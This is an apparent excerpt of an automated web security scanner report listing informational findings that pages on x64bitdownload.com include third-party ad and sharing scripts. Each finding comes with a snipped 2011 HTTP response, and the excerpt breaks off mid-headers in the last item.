Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.11. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.12. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.13. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.14. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.15. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.16. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.17. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.18. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.19. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.20. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.21. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.22. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.23. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.24. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.25. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.26. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:10 GMT
Cache-Control: max-age=600
Pragma: cache
